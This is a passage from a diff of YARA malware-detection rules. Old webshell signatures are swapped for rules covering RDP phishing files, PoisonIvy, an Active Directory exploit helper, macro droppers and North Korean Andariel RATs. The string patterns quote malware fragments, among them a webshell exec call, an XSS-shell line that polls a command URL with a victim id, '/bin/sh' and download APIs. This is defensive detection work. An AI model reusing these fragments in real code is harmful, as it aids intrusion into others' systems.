-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8410-L8424"
+		description = "Detects characteristics found in malicious RDP files used as email attachments in spear phishing campaigns"
+		author = "Florian Roth"
+		id = "16128c1e-64ed-5a3e-ad1e-e0330d91f5a9"
+		date = "2024-10-25"
+		modified = "2024-12-12"
+		reference = "https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nobellium_rdp_phish.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "17037fa684ef4c90a25ec5674dac2eb6"
-		logic_hash = "d2a86083ff5cb34a0453f812e2d316c63342e529f00099a8869fa7e0a43321ef"
+		logic_hash = "55bd63738c38719ce7aeb874956488b0d3f7167a31d880ee61994b5921bd1458"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "280fbf353fdffefc5a0af40c706377142fff718c7b87bc8b0daab10849f388d0"
+		hash2 = "8b45f5a173e8e18b0d5c544f9221d7a1759847c28e62a25210ad8265f07e96d5"
+		hash3 = "9b8cb8b01ce4eafb9204250a3c28bfaf70cc76a99ce411ad52bbf1aa2b6cce34"
+		hash4 = "ba4d58f2c5903776fe47c92a0ec3297cc7b9c8fa16b3bf5f40b46242e7092b46"
+		hash5 = "f357d26265a59e9c356be5a8ddb8d6533d1de222aae969c2ad4dc9c40863bfe8"
 
 	strings:
-		$s0 = "$Info: This file is packed with the UPX executable packer $"
-		$s2 = "$License: NRV for UPX is distributed under special license $"
-		$s6 = "AdjustCR Carr"
-		$s7 = "ION\\System\\FloatingPo"
+		$s1 = "redirectclipboard:i:1" wide fullword
+		$s2 = "redirectprinters:i:1" wide fullword
+		$s3 = "remoteapplicationmode:i:1" wide fullword
+		$s4 = "username:s:" wide
+		$s5 = "emoteapplicationicon:s:C:\\Windows\\SystemApps" wide
 
 	condition:
-		all of them
+		filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_Felikspack3___PHP_Shells_Xishell
+rule SIGNATURE_BASE_Poisonivy_Generic_3 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file xIShell.php"
+		description = "PoisonIvy RAT Generic Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "32a32a9a-8d5f-5b3f-8ff4-560555f0ae1e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
+		id = "0f6a47ee-b741-59cc-b2d6-6bf3989ce8e7"
+		date = "2015-05-14"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8425-L8436"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy_gen3.yar#L2-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "997c8437c0621b4b753a546a53a88674"
-		logic_hash = "13393bc72477ab9a4ebc16b409de8ed73e086cc41f25f34315d11401b63c2471"
+		hash = "e1cbdf740785f97c93a0a7a01ef2614be792afcd"
+		logic_hash = "8116b07c00218a0e9784447f322455ff24ae754770b85db760b1c397e10e5695"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "if (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='Java"
+		$k1 = "Tiger324{" fullword ascii
+		$s2 = "WININET.dll" fullword ascii
+		$s3 = "mscoree.dll" fullword wide
+		$s4 = "WS2_32.dll" fullword
+		$s5 = "Explorer.exe" fullword wide
+		$s6 = "USER32.DLL"
+		$s7 = "CONOUT$"
+		$s8 = "login.asp"
+		$h1 = "HTTP/1.0"
+		$h2 = "POST"
+		$h3 = "login.asp"
+		$h4 = "check.asp"
+		$h5 = "result.asp"
+		$h6 = "upload.asp"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( $k1 or all of ( $s* ) or all of ( $h* ) )
 }
-rule SIGNATURE_BASE_Hytop_Apppack_2005
+rule SIGNATURE_BASE_HKTL_EXPL_WIN_PS1_Badsuccessor_May25 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file 2005.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "67c86d16-a962-5502-8c39-0a6e3dc04031"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8437-L8448"
+		description = "Detects PowerShell tool called Get-BadSuccessorOUPermissions.ps1 that helps exploit a vulnerability in Active Directory. Lists every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions."
+		author = "Florian Roth"
+		id = "5bc135f2-dc7f-51e9-ba19-b63af64f0deb"
+		date = "2025-05-22"
+		modified = "2025-05-22"
+		reference = "https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/hktl_badsuccessor_helper_may25.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
-		logic_hash = "0de4800291132efca24b40bebcc895d6873110214c8cbf8384317208e0d9db82"
+		logic_hash = "a023bced4aec2b2c601088367766f42a3fcf36053c7eb92985cc7468c7cd6cb0"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s6 = "\" onclick=\"this.form.sqlStr.value='e:\\hytop.mdb"
+		$x1 = "function Get-BadSuccessorOUPermissions" ascii wide
+		$x2 = "\"0feb936f-47b3-49f2-9386-1dedc2c23765\"=\"msDS-DelegatedManagedServiceAccount\"" ascii wide
+		$x3 = "CreateChild|GenericAll|WriteDACL|WriteOwner" ascii wide
 
 	condition:
-		all of them
+		filesize < 20MB and 1 of them
 }
-rule SIGNATURE_BASE_Xssshell
+rule SIGNATURE_BASE_Cobaltgang_PDF_Metadata_Rev_A
 {
 	meta:
-		description = "Webshells Auto-generated - file xssshell.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ef89653c-5814-525a-b04e-4326a80f780c"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8449-L8460"
+		description = "Find documents saved from the same potential Cobalt Gang PDF template"
+		author = "Palo Alto Networks Unit 42"
+		id = "bcf5bf6e-c786-5f78-bf58-e0631a17e62e"
+		date = "2018-10-25"
+		modified = "2023-12-05"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/10/unit42-new-techniques-uncover-attribute-cobalt-gang-commodity-builders-infrastructure-revealed/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cobalt_gang_pdf.yar#L1-L12"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8fc0ffc5e5fbe85f7706ffc45b3f79b4"
-		logic_hash = "6b0e602b523f58ec61850b4ba2e69da4fe4bf2833fb45e529785a398445db127"
+		logic_hash = "8020ccff761b49d98e18cd5cb3c0695956a88e86a0958bfba1a19b7e3e629bb9"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if( !getRequest(COMMANDS_URL + \"?v=\" + VICTIM + \"&r=\" + generateID(), \"pushComma"
+		$ = "<xmpMM:DocumentID>uuid:31ac3688-619c-4fd4-8e3f-e59d0354a338" ascii wide
 
 	condition:
-		all of them
+		any of them
 }
-rule SIGNATURE_BASE_Felikspack3___PHP_Shells_Usr
+rule SIGNATURE_BASE_ONHAT_Proxy_Hacktool : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file usr.php"
+		description = "Detects ONHAT Proxy - Htran like SOCKS hack tool used by Chinese APT groups"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ab1825fe-96aa-5d97-acd6-eac43a12b237"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8461-L8472"
+		id = "cb18a5b0-dbbd-5dd3-af66-21b8302df6de"
+		date = "2016-05-12"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/p32Ozf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_onhat_proxy.yar#L8-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ade3357520325af50c9098dc8a21a024"
-		logic_hash = "f5fd4a4c1b531b23b09505d302dc27d7ba2eb733fcf313c04ba9085b090f7cbe"
-		score = 75
+		logic_hash = "d8c088ecdedbd74ca174244c407c3bb27ccd082ec515c62ee19c93e0d45d3f3b"
+		score = 100
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "30b2de0a802a65b4db3a14593126301e6949c1249e68056158b2cc74798bac97"
+		hash2 = "94bda24559713c7b8be91368c5016fc7679121fea5d565d3d11b2bb5d5529340"
+		hash3 = "a26e75fec3b9f7d5a1c3d0ce1e89e4b0befb7a601da0c69a4cf96301921771dd"
+		hash4 = "c202e9d5b99f6137c7c07305c7314e55f52bae832d460c44efc8f2a90ff03615"
+		hash5 = "dded62ad85c0bdd68bcc96f88d8ba42d5ad0ef999911ebdea3f561a4491ebbc6"
+		hash6 = "f0954774c91603fc2595f0ba0727b9af4e80f6f9be7bb629e7fb6ba4309ed4ea"
+		hash7 = "f3906be01d51e2e1ae9b03cd09702b6e0794b9c9fd7dc04024f897e96bb13232"
+		hash8 = "f65ae9ccf988a06a152f27a4c0d7992100a2d9d23d80efe8d8c2a5c9bd78a3a7"
 
 	strings:
-		$s0 = "<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor"
+		$s1 = "INVALID PARAMETERS. TYPE ONHAT.EXE -h FOR HELP INFORMATION." fullword ascii
+		$s2 = "[ONHAT] LISTENS (S, %d.%d.%d.%d, %d) ERROR." fullword ascii
+		$s3 = "[ONHAT] CONNECTS (T, %d.%d.%d.%d, %d.%d.%d.%d, %d) ERROR." fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and ( 1 of ( $s* ) ) ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_FSO_S_Phpinj
+rule SIGNATURE_BASE_SUSP_Maldoc_Excelmacro : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file phpinj.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5d84d518-0e18-517f-890b-e296ac265c50"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8473-L8484"
+		description = "Detects malicious Excel macro Artifacts"
+		author = "James Quinn"
+		id = "76806717-a9a8-520e-b6b6-7718eb088de5"
+		date = "2020-11-03"
+		modified = "2023-12-05"
+		reference = "YARA Exchange - Undisclosed Macro Builder"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_macro_builders.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "dd39d17e9baca0363cc1c3664e608929"
-		logic_hash = "de4ac200f5426ec4c6fef21d5fbc37281811569a3e71a9bcb6fa51d13eb600a4"
-		score = 75
+		logic_hash = "c5d0655eaf2ca36c828675f9673a1d4284ef8719fd9ec1d354ee3284d1fb0a0c"
+		score = 65
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s4 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';"
+		$artifact1 = {5c 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 2e 00 ?? 00 ?? 00}
+		$url1 = "http://" wide
+		$url2 = "https://" wide
+		$import1 = "URLDownloadToFileA" wide ascii
+		$macro = "xl/macrosheets/"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x4b50 and filesize < 2000KB and $artifact1 and $macro and $import1 and 1 of ( $url* )
 }
-rule SIGNATURE_BASE_Xssshell_Db
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Scheduledtask_Loader : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file db.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "94bb2297-95a2-5442-bb16-fb079a29606e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8485-L8496"
+		description = "Detects a scheduled task loader used by Andariel"
+		author = "CISA.gov"
+		id = "0c32758b-480c-5784-b28f-cee85d038850"
+		date = "2024-07-25"
+		modified = "2026-01-29"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L3-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cb62e2ec40addd4b9930a9e270f5b318"
-		logic_hash = "3fdbaa17c12abef8576bf859065d90f4b6e80c187af734b71b26a1bd5d073e86"
-		score = 75
+		logic_hash = "2d32ee777cb40c6fa58787e92c0de074ea5b81d629a17ccb4f9432d62436f03c"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s8 = "'// By Ferruh Mavituna | http://ferruh.mavituna.com"
+		$obfuscation1 = { B8 02 00 00 00 48 6B C0 00 B9 CD FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 01 B9 CC FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 02 B9 8D FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 03 B9 9A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 04 B9 8C FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 05 B9 8A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 06 33 C9 66 89 8C 04 60 01 00 00 }
+		$obfuscation2 = { 48 6B C0 02 C6 44 04 20 BA B8 01 00 00 00 48 6B C0 03 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 04 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 05 C6 44 04 20 8A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 9C B8 01 00 00 00 }
+		$obfuscation3 = { 48 6B C0 00 C6 44 04 20 A8 B8 01 00 00 00 48 6B C0 01 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 02 C6 44 04 20 93 B8 01 00 00 00 48 6B C0 03 C6 44 04 20 96 B8 01 00 00 00 48 6B C0 04 C6 44 04 20 B9 B8 01 00 00 00 48 6B C0 05 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 07 C6 44 04 20 9E B8 01 00 00 00 48 6B C0 08 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 09 C6 44 04 20 8D B8 01 00 00 00 48 6B C0 0A C6 44 04 20 BC B8 01 00 00 00 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and $obfuscation1 and $obfuscation2 and $obfuscation3
 }
-rule SIGNATURE_BASE_PHP_Sh
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Kaosrat_Yamabot
 {
 	meta:
-		description = "Webshells Auto-generated - file sh.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "08dff4db-3b1c-5702-a8c9-efaedf83c4ff"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8497-L8508"
+		description = "Detects the KaosRAT variant"
+		author = "CISA.gov"
+		id = "cdde69cd-1b38-52f5-8552-cef2cf4ad69c"
+		date = "2024-07-25"
+		modified = "2026-01-29"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L20-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1e9e879d49eb0634871e9b36f99fe528"
-		logic_hash = "da0b572f116cc5c55e8d7469f222896d602d09be4761a0e2139fc8ce67ac4050"
-		score = 75
+		logic_hash = "92182aac2e56041292102b0486b7de1ee6eb3d54a9fc6786c567acd92073cd84"
+		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\"@$SERVER_NAME \".exec(\"pwd\")"
+		$str1 = "/kaos/"
+		$str2 = "Abstand ["
+		$str3 = "] anwenden"
+		$str4 = "cmVjYXB0Y2hh"
+		$str5 = "/bin/sh"
+		$str6 = "utilities.CIpaddress"
+		$str7 = "engine.NewEgg"
+		$str8 = "%s%04x%s%s%s"
+		$str9 = "Y2FwdGNoYV9zZXNzaW9u"
+		$str10 = "utilities.EierKochen"
+		$str11 = "kandidatKaufhaus"
 
 	condition:
-		all of them
+		3 of them
 }
-rule SIGNATURE_BASE_Xssshell_Default
+rule SIGNATURE_BASE_MAL_APT_NK_Trifaux_Easyrat_JUPITER : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file default.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1c221572-4cb5-5806-a856-0f857dba230a"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8509-L8520"
+		description = "Detects a variant of the EasyRAT malware family"
+		author = "CISA.gov"
+		id = "8bd72287-59da-53cf-9015-66149303e59f"
+		date = "2024-07-25"
+		modified = "2026-01-29"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L44-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d156782ae5e0b3724de3227b42fcaf2f"
-		logic_hash = "6a8772a8a6399c3266abcc22a3c55eda70ec9703346398f5f1768bbd35974f8c"
-		score = 75
+		logic_hash = "6108035dbebd34fe994fc1f8b4123321321f6ed5c022be6e84a88f905ea6fb73"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s3 = "If ProxyData <> \"\" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, \"<br />\")"
+		$InitOnce = "InitOnceExecuteOnce"
+		$BREAK = { 0D 00 0A 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 0D 00 0A }
+		$Bytes = "4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00," wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Editserver_2
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Cutiedrop_Magicrat : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file EditServer.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bd254bd9-fd23-5807-9347-2a559089b7c5"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8521-L8534"
+		description = "Detects the MagicRAT variant used by Andariel"
+		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
+		id = "104244de-83fb-5112-a2b6-e20d38a6ced6"
+		date = "2024-07-25"
+		modified = "2026-01-29"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L61-L85"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5c1f25a4d206c83cdfb006b3eb4c09ba"
-		logic_hash = "c581936928ce0f1061feb5665c743f14f12a9f875e360f40cc064f3047b23adf"
-		score = 75
+		logic_hash = "f289bbd71bdeaf2c42063642454679ec26de5ed24c020af40db694a0ced54884"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "@HOTMAIL.COM"
-		$s1 = "Press Any Ke"
-		$s3 = "glish MenuZ"
+		$config_os_w = "os/windows" ascii
+		$config_os_l = "os/linux" ascii
+		$config_os_m = "os/mac" ascii
+		$config_comp_msft = "company/microsoft" ascii
+		$config_comp_orcl = "company/oracle" ascii
+		$POST_field_1 = "session=" ascii
+		$POST_field_2 = "type=" ascii
+		$command_misspelled = "renmae" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-rule SIGNATURE_BASE_By064Cli
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_HHSD_Filetransfertool : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file by064cli.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9ea88f0c-9275-5567-a4d9-0545de8044d1"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8535-L8547"
+		description = "Detects a variant of the HHSD File Transfer Tool"
+		author = "CISA.gov"
+		id = "46b6dbaf-1272-5bbd-a586-5e48ba6c5022"
+		date = "2024-07-25"
+		modified = "2025-07-09"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L87-L125"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "10e0dff366968b770ae929505d2a9885"
-		logic_hash = "51efd5c510efc6657ae175af47b09437ae70eb0237d88ffdf3cdae365d0ec7be"
-		score = 75
+		logic_hash = "665c1b27d64d5377be98aa4e629b077e56f3a44273d98653a338439b3dc05b65"
+		score = 70
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s7 = "packet dropped,redirecting"
-		$s9 = "input the password(the default one is 'by')"
+		$handshake = { 30 ?? ?? 81 7? ?? 22 C0 78 00 4? 88 }
+		$err_xor_str = { 14 C7 [2] 14 00 41 00 C7 [2] 7A 00 7F 00 C7 [2] 7B 00 63 00 C7 [2] 7A 00 34 00 }
+		$hash_call_loadlib = { B? 8D 10 B7 F8 E8 }
+		$hash_call_unk = { B? 91 B8 F6 88 E8 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and 1 of ( $handshake , $err_xor_str ) and 1 of ( $hash_call_* ) or 2 of ( $handshake , $err_xor_str )
 }
-rule SIGNATURE_BASE_Mithril_Dlltest
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Atharvan_3RAT : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file dllTest.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "59a6bfb6-c099-56cd-b40e-3e92ea0eb7d3"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8548-L8560"
+		description = "Detects a variant of the Atharvan 3RAT malware family"
+		author = "CISA.gov"
+		id = "9ff6998a-a2dd-5671-bd3f-ee69561f71ef"
+		date = "2024-07-25"
+		modified = "2026-01-29"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L127-L141"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a8d25d794d8f08cd4de0c3d6bf389e6d"
-		logic_hash = "c8c8d1b75ed4eb4bc66a762e53aa6b3ab439e96ef464a8b9ffa4dff887986465"
-		score = 50
+		logic_hash = "741318234e245a35accc0b102a7891559ce5ef868ccdc3e6e4c8e59d8dea8b24"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "please enter the password:"
-		$s3 = "\\dllTest.pdb"
+		$3RAT = "D:\\rang\\TOOL\\3RAT"
+		$atharvan = "Atharvan_dll.pdb"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_Peek_A_Boo
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Lilithrat_Variant : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file peek-a-boo.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f6ca33b5-e37f-5124-a193-a3056c559314"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8561-L8577"
+		description = "Detects a variant of the Lilith RAT malware family"
+		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
+		id = "916a289b-db7b-5f09-9d3e-589c3f09101d"
+		date = "2024-07-25"
+		modified = "2024-07-26"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L143-L178"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "aca339f60d41fdcba83773be5d646776"
-		logic_hash = "b103c1b873dd0df9626d72a1127fbadc821777a05012a080423263a2083c398b"
-		score = 75
+		logic_hash = "3ce68908468ff85683b081842fa4faa579fbf6f7dc1a7fab5dcf7eac63d90aea"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "__vbaHresultCheckObj"
-		$s1 = "\\VB\\VB5.OLB"
-		$s2 = "capGetDriverDescriptionA"
-		$s3 = "__vbaExceptHandler"
-		$s4 = "EVENT_SINK_Release"
-		$s8 = "__vbaErrorOverflow"
+		$lilith_1 = "Initiate a CMD session first." ascii
+		$lilith_2 = "CMD is not open" ascii
+		$lilith_3 = "Couldn't write command" ascii
+		$lilith_4 = "Couldn't write to CMD: CMD not open" ascii
+		$unique_1 = "Upload Error!" ascii
